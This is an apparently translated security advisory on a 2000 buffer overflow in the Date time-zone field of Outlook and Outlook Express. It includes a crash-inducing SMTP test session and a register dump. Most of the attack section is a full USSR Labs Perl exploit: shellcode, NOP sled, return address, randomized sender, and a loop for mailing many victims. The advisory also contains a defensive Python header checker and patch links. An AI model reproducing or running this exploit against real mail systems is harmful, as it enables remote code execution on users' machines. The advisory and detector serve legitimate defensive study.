Security Vulnerability
Microsoft Outlook/Outlook Express GMT Field Buffer Overflow Vulnerability

Published: 2000-07-20
Updated: 2000-07-20

Affected systems:

Microsoft Outlook 97.0
Microsoft Outlook 98
Microsoft Outlook 2000
Microsoft Outlook Express 5.0
Microsoft Outlook Express 4.0.1
Microsoft Outlook Express 4.0
   - Microsoft Windows 98
   - Microsoft Windows 95
   - Microsoft Windows NT 4.0


Description:


All versions of Microsoft Outlook and Outlook Express contain a buffer overflow. A remote attacker may be able to execute arbitrary code on the host that receives the mail. The problem lies in Outlook's handling of the GMT (time-zone) field of the message header. This work is done by INETCOMM.DLL; because the length of the GMT field is not checked, a malicious user can craft a special message with a very long string in the GMT field and cause Outlook to overflow. If the GMT field is filled with arbitrary data, Outlook crashes; if it is filled with executable code, Outlook/Outlook Express may execute arbitrary code.

For example:

Date: Tue, 18 July 2000 14:16:06 +1000<long string of characters>

Note: the severity of this vulnerability lies in the fact that the user does not need to view the message; the overflow occurs as soon as the message is downloaded via POP3 or IMAP4.

<* Source: USSR Labs <labs@ussrback.com>
         Aaron Drew <ripper@hotkey.net.au>
*>


Test method:

WARNING

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!

Send a test message through an SMTP server:

HELO
MAIL FROM: BILLGATES@MICROSOFT.COM
RCPT TO: MY@EMAIL.COM
DATA
Date: Thu,13 Jun 2000 12:33:16
+1111111111111111111111111111111111111111111111111111111111111
(dot here)
QUIT
Then retrieve the message with Outlook; an invalid page fault occurs:


    OUTLOOK caused an invalid page fault in
    module <unknown> at 00de:00aedc5a.
    Registers:
    EAX=80004005 CS=016f EIP=00aedc5a EFLGS=00010286
    EBX=70bd4899 SS=0177 ESP=0241ef94 EBP=31313131
    ECX=00000000 DS=0177 ESI=0241efc6 FS=2b57
    EDX=81c0500c ES=0177 EDI=0241efc4 GS=0000
    Bytes at CS:EIP:
    Stack dump:
    0241f360 0241f554 00000000 00000001 00000000 004580d0 00000054 00000054
    0241efc4 0000003b 00000100 00000017 3131312b 31313131 31313131 31313131
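
As an added example that is not part of the advisory or of USSR Labs' code, the following Python (assumed names unfold_headers and check_date_zone) applies on the receiving side the length check that INETCOMM.DLL lacked for the GMT field described above: it unfolds the headers of a raw message and rejects a Date header whose time-zone field is longer than the five bytes a legitimate "+HHMM" zone takes, so a mail gateway or log pipeline can flag messages shaped like the test message in this section before a vulnerable client downloads them. The two sample messages are constructed.

```python
import re

# Longest legitimate numeric zone is "+HHMM" (5 bytes); INETCOMM.DLL never bounded this field.
MAX_ZONE_LEN = 5
ZONE_RE = re.compile(r"^(?:[+-]\d{4}|[A-Za-z]{1,5})$")   # +HHMM or GMT/UT/EST...
TIME_RE = re.compile(r"^\d{1,2}:\d{2}(?::\d{2})?$")         # HH:MM[:SS]


def unfold_headers(raw: bytes) -> dict:
    """Header block as {lower-name: value}, joining folded continuation lines like a mail client."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    headers, name = {}, None
    for line in head.split("\r\n"):
        if line[:1] in (" ", "\t") and name is not None:
            headers[name] += " " + line.strip()       # folded part of the previous header
        elif ":" in line:
            name, _, value = line.partition(":")
            name = name.strip().lower()
            headers[name] = value.strip()
    return headers


def check_date_zone(raw: bytes) -> dict:
    """Verdict on the Date time-zone field; ok=False means quarantine/log before a client fetches it."""
    date = unfold_headers(raw).get("date")
    if date is None:
        return {"ok": True, "reason": "no Date header", "zone_len": 0}
    tokens = date.split()
    # The zone is everything after the HH:MM[:SS] token; a folded overlong
    # value (as in the advisory's test message) still ends up here.
    for i, tok in enumerate(tokens):
        if TIME_RE.match(tok):
            zone = re.sub(r"\s*\([^)]*\)\s*$", "", " ".join(tokens[i + 1:]))  # drop "(AEST)" comments
            break
    else:
        return {"ok": False, "reason": "no time field in Date", "zone_len": len(date)}
    if len(zone) > MAX_ZONE_LEN or not ZONE_RE.match(zone):
        return {"ok": False, "reason": "malformed or oversized time-zone field", "zone_len": len(zone)}
    return {"ok": True, "reason": "zone well-formed", "zone_len": len(zone)}


# Constructed sample messages (not real traffic).
BENIGN = (b"From: alice@example.com\r\nDate: Tue, 18 Jul 2000 14:16:06 +1000\r\n"
          b"Subject: hello\r\n\r\nbody\r\n")
# Mirrors the advisory's test message: the zone is folded onto a continuation
# line and is 61 bytes long instead of at most 5.
SUSPECT = (b"From: x@example.com\r\nDate: Thu,13 Jun 2000 12:33:16\r\n +" + b"1" * 60 +
           b"\r\nSubject: test\r\n\r\nbody\r\n")

if __name__ == "__main__":
    for label, msg in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(label, check_date_zone(msg))
```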
USSR Labs provides several test programs:
Unix/Linux Perl Version:
http://www.ussrback.com/outoutlook.pl

Windows Console Version:
http://www.ussrback.com/outoutlook.exe

Windows Console Version Source:
http://www.ussrback.com/outoutlook.zip

================ outoutlook.pl =======================
#!/usr/bin/perl
#******************************************************************************
#http://www.ussrback.com Ussr Labs (Exploitable Buffer Overflow)
# Outlook Express 5.0 | Outlook 2000 | Outlook 97.0 | Outlook 98
#******************************************************************************
#
# By: Ussr Labs
#
# Arbitrary shellcode injector over SMTP
# ./$0 -h <server hostname>  -m <mail>
# ./dieoutlook.pl -h <smtp server> -m victim@address.com
#
#
#
# For multiple email spawns do something like this:
#
# for i in `cat emailshere.txt`; do perl ./outoutlook.pl -h smtpserverip -m $i; done
#
#
#
#


use Getopt::Std;
use Socket;
getopt('h:m', \%args);

# user defined variables
if(defined($args{h})){$serv=$args{h}}else{&usage;}
if(defined($args{m})){$rcpt=$args{m}}else{&usage;}

# These are the escape characters which will cause the seg violation.
# *nix didn't like the ascii interpretation, so we send the
# characters in hex.
# +,1 ,?,^ ,?,z ,?,x

$spawn = "\x2b\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31" .
    "\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31" .
    "\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31" .
    "\x31\x31\x31\x31\x31\x31\x31\x31\x5a\xdc\xae\x20\x78\x0d\x0a";

$shellcode = "\xE8\x00\x00\x00\x00\x5D\x81\xED\x40\x10\x40\x00\x81\xC4\x00" .
    "\x03\x00\x00\xB8\x38\x10\x00\x01\x8B\x00\x89\x85\x0B\x11\x40\x00" .
    "\x8C\xC8\xA8\x04\x75\x08\x8B\x85\x1F\x11\x40\x00\xEB\x06\x8B\x85" .
    "\x23\x11\x40\x00\x89\x85\x1F\x11\x40\x00\x8D\x8D\x42\x11\x40\x00" .
    "\x51\x50\xFF\x95\x0B\x11\x40\x00\x89\x85\x0F\x11\x40\x00\x8D\x8D" .
    "\x53\x11\x40\x00\x51\xFF\x95\x0F\x11\x40\x00\x8D\x8D\x34\x11\x40" .
    "\x00\x51\x50\xFF\x95\x0B\x11\x40\x00\x89\x85\x13\x11\x40\x00\x8B" .
    "\x85\x1F\x11\x40\x00\x8D\x8D\x27\x11\x40\x00\x51\x50\xFF\x95\x0B" .
    "\x11\x40\x00\x89\x85\x17\x11\x40\x00\x8D\x85\x1B\x11\x40\x00\x50" .
    "\x6A\x00\x6A\x00\x8D\x85\xE3\x10\x40\x00\x50\x6A\x00\x6A\x00\x8B" .
    "\x85\x17\x11\x40\x00\xFF\xD0\xEB\xFE\x60\xE8\x00\x00\x00\x00\x5D" .
    "\x81\xED\xE9\x10\x40\x00\x6A\x00\x6A\x00\x6A\x00\x8D\xB5\x5F\x11" .
    "\x40\x00\x56\x6A\x00\x6A\x00\xFF\x95\x13\x11\x40\x00\x61\xC2\x10" .
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" .
    "\x00\x00\x00\x00\x00\x00\x00\xF0\x77\x00\x00\xF7\xBF\x43\x72\x65" .
    "\x61\x74\x65\x54\x68\x72\x65\x61\x64\x00\x53\x68\x65\x6C\x6C\x45" .
    "\x78\x65\x63\x75\x74\x65\x41\x00\x47\x65\x74\x4D\x6F\x64\x75\x6C" .
    "\x65\x48\x61\x6E\x64\x6C\x65\x41\x00\x73\x68\x65\x6C\x6C\x33\x32" .
    "\x2E\x64\x6C\x6C\x00\x77\x77\x77\x2E\x75\x73\x73\x72\x62\x61\x63" .
    "\x6B\x2E\x63\x6F\x6D\x00";

$ret = "00aedc5a";                        # return address
$nop = "\x90";                            # x86 NOP
$port = 25;                            # default 25 SMTP port
$buffsize = "1348";                        # buffer size
$buffer .= $nop x 945;                        # load $buffer with 945 NOP then $shellcode
$buffer .= $shellcode;                        # append shellcode to buffer
$offset = (hex $ret);                        # return hex string to corresponding value
$code = pack("N", $offset);                    # big-endian (long) network order
while (length $buffer < $buffsize) { $buffer .= $code; }
$buffer .= "\n\n";
print "$code\n";

# create random MAIL FROM field. format is: [ alphanumeric ] @ [ characters ] . [ domain ]

$max=(int rand 15);
@a=('a'..'z', '1'..'10'); for (1..$max) { $str .= $a[rand @a] }
@a=('a'..'z'); for (1..$max) { $host .= $a[rand @a] }
@dom = ('.com', '.net', '.org');
$rdom = $dom[ rand @dom ];
$rmail = $str . "@" . $host . $dom;
print "random address set to: $rmail\n";

# random date method, format: Date: <day>, <int-day> <month> 2000 <time>

@days = ('Mon', 'Tue', 'Wed', 'Thu', 'Fri', 'Sat', 'Sun');
$rday = $days[ rand @days ];
$rcal=(int rand(31));
$rhour=(int rand(23)); if ($rhour < 10){ $rhour = "0".$rhour; }
$rmin=(int rand(59)); if ($rmin < 10){ $rmin = "0".$rmin; }
$rsec=(int rand(59)); if ($rsec < 10){ $rsec = "0".$rsec; }
@months = ('Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Oct', 'Sep', 'Nov', 'Dec');
$rmonth = $months[ rand @months ];
$date = "Date: ".$rday.","; if ( $rcal >9 ){$date = $date."$rcal"." $rmonth"." 2000 ".$rhour.":".$rmin.":".$rsec," ";}
else { $date = $date." $rcal"." $rmonth"." 2000 ".$rhour.":".$rmin.":".$rsec," ";}
print "date set to: $date\n";

$in_addr = (gethostbyname($serv))[4] || die("Error: $!\n");
$paddr = sockaddr_in($port, $in_addr) || die ("Error: $!\n");
$proto = getprotobyname('tcp') || die("Error: $!\n");

socket(S, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(S, $paddr) || die("Error: $!\n");
select(S); $| = 1; select(STDOUT);

# begin our SMTP transaction

print "now starting SMTP transaction\n";
$res=<S>; print "$res\n";
print "sending HELO\n";
system("sleep 2s");
print S "HELO\r\n";
$res=<S>; print "$res\n";

print "sending MAIL FROM\n";
system("sleep 2s");
print S "MAIL FROM:$rmail\r\n";
$res=<S>; print "$res\n";

print "sending RCPT\n";
system("sleep 2s");
print S "RCPT TO:$rcpt\r\n";
$res=<S>; print "$res\n";

print "sending DATA\n";
system("sleep 2s");
print S "DATA\r\n";
$res=<S>; print "$res\n";

print "sending escape characters\n";
print S "$date";
print S " $spawn";

print "sending shellcode\n";
print S "$shellcode\r\n\r\n\r\n";
#$res=<S>; print "$res\n";
print S ".\r\n";
print S "QUIT\r\n";

print "shellcode spawn was successful\n";
close(S);


sub usage {die("\n\n./$0 -h <hostname> -m <mail>\n\n");}



Recommendation:

Microsoft has provided patches, which can be downloaded for the respective versions:

- Internet Explorer 5.01 Service Pack 1,
   http://www.microsoft.com/Windows/ie/download/ie501sp1.htm
- Internet Explorer 5.5 on any system except Windows 2000,
   http://www.microsoft.com/windows/ie/download/ie55.htm


This advisory was translated and compiled by NSFOCUS. All rights reserved; reproduction without permission is prohibited.